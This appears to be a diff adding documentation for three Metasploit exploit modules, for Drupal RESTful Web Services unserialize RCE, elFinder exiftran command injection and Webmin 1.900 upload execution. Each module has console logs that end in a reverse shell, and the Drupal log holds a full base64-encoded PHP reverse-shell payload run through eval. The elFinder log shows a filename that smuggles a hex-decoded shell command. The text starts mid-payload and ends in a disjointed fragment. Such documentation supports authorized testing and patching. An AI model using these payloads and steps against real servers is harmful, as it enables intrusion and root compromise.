Whvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));
 [*] Sending stage (37775 bytes) to 172.17.0.3
 [*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:46654) at 2018-04-24 23:25:17 -0500
@@ -0,0 +1,71 @@
+## Intro
+
+This module exploits a PHP `unserialize()` vulnerability in Drupal RESTful
+Web Services by sending a crafted request to the `/node` REST endpoint.
+
+As per [SA-CORE-2019-003], the initial remediation was to disable `POST`,
+`PATCH`, and `PUT`, but Ambionics [discovered] that `GET` was also vulnerable
+(albeit cached).
+
+Drupal updated [SA-CORE-2019-003] with [PSA-2019-02-22] to notify users of
+this alternate vector.
+
+[SA-CORE-2019-003]: https://www.drupal.org/sa-core-2019-003
+[PSA-2019-02-22]:   https://www.drupal.org/psa-2019-02-22
+[discovered]:       https://www.ambionics.io/blog/drupal8-rce
+
+Drupal < 8.5.11 and < 8.6.10 are vulnerable.
+
+## Setup
+
+`docker run -dp 80:80 drupal:8.6.9` and enable the HAL, HTTP Basic
+Authentication, RESTful Web Services, and Serialization modules at
+`/admin/modules`.
+
+Clear all caches at `/admin/config/development/performance` to repeat
+exploitation if targeted nodes are cached.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   PHP In-Memory
+1   Unix In-Memory
+```
+
+## Options
+
+**METHOD**
+
+Set this to the HTTP method to use. `POST` and `GET` (cached) are known
+to work.
+
+**NODE**
+
+Set this to a node ID on the target when using the `GET` method.
+
+## Usage
+
+```
+msf5 exploit(unix/webapp/drupal_restws_unserialize) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Drupal 8 targeted at http://127.0.0.1/
+[!] CHANGELOG.txt no longer contains patch level
+[*] Executing with system(): echo 2oZashoKJTvVkPgkVLcTaehAdiv
+[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
+[+] Drupal is vulnerable to code execution
+[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
+[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
+[*] Sending stage (38247 bytes) to 192.168.1.2
+[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:55653) at 2019-03-05 19:26:37 -0600
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : 11f5c33da9ec
+OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -0,0 +1,90 @@
+## Description
+
+  This module exploits a command injection vulnerability in elFinder
+  versions prior to 2.1.48.
+
+  The PHP connector component allows unauthenticated users to upload
+  files and perform file modification operations, such as resizing and
+  rotation of an image. The file name of uploaded files is not validated,
+  allowing shell metacharacters.
+
+  When performing image operations on JPEG files, the filename is passed
+  to the `exiftran` utility without appropriate sanitization, causing
+  shell commands in the file name to be executed, resulting in remote
+  command injection as the web server user.
+
+  The PHP connector is not enabled by default.
+
+  The system must have `exiftran` installed and in `$PATH`.
+
+
+## Vulnerable Software
+
+  [elFinder](https://studio-42.github.io/elFinder/) is an open-source file
+  manager for web, written in JavaScript using jQuery and jQuery UI.
+
+  This module has been tested successfully on elFinder versions 2.1.47,
+  2.1.20 and 2.1.16 on Ubuntu.
+
+  Enable the PHP connector:
+
+  ```
+  mv php/connector.minimal.php-dist php/connector.minimal.php
+  ```
+
+  Install required `exiftran` utility:
+
+  ```
+  apt-get install exiftran
+  ```
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection`
+  3. Do: `set rhosts <IP>`
+  4. Do: `run`
+  5. You should get a new session
+
+## Options
+
+  **TARGETURI**
+
+  The base path to elFinder (default: `/elFinder/`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
+  rhosts => 172.16.191.253
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
+  targeturi => /elFinder-2.1.47
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
+  verbose => true
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
+  [*] 172.16.191.253:80 - The target service is running, but could not be validated.
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
+  
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
+  [*] Triggering vulnerability via image rotation ...
+  [*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
+  [*] Sending stage (38247 bytes) to 172.16.191.253
+  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
+  [!] Tried to delete .kPUXqhMZ.php, unknown result
+  [*] No reply
+  [*] Removing uploaded file ...
+  [+] Deleted uploaded file
+  
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > sysinfo
+  Computer    : ubuntu
+  OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
+  Meterpreter : php/linux
+  meterpreter > 
+  ```
+
@@ -0,0 +1,63 @@
+## Description
+
+This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900.
+
+## Vulnerable Application
+
+This module has been tested with [Webmin 1.900](https://sourceforge.net/projects/webadmin/files/webmin/1.900/)
+
+## Options
+
+**GUESSUPLOAD**
+
+Use default installation path `/usr/share/webmin/`
+
+## Verification Steps
+
+1. `use exploit/unix/webapp/webmin_upload_exec`
+2. `set rhosts <rhost>`
+3. `set username <username>`
+4. `set password <password>`
+5. `exploit`
+
+## Scenarios
+
+### Tested Webmin 1.900 on Ubuntu 18.04 x64
+
+```
+msf5 > use exploit/unix/webapp/webmin_upload_exec
+msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154
+rhosts => 172.22.222.154
+msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser
+username => unixuser
+msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser
+password => unixuser
+msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[+] Session cookie: 6215747dab393701e0acbb9ac5b7c699
+[*] Target URL => https://172.22.222.154:10000
+[*] Searching for directory to upload...
+[-] Failed to determine webmin share directory
+[-] Set GUESSUPLOAD to attempt upload to a default location
+[*] Exploit completed, but no session was created.
+msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true
+guessupload => true
+msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[+] Session cookie: 46cbd354e4532fe55d1a462db128905c
+[*] Target URL => https://172.22.222.154:10000
+[*] Searching for directory to upload...
+[!] Could not determine upload directory. Using /usr/share/webmin/
+[+] File gxvgsiji.cgi was successfully uploaded.
+[*] Attempting to execute the payload...
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38960) at 2019-03-14 13:40:56 -0500
+[+] Deleted gxvgsiji.cgi
+
+uname -a 
+Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+whoami
+root
+exit
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .5.3
 .6.1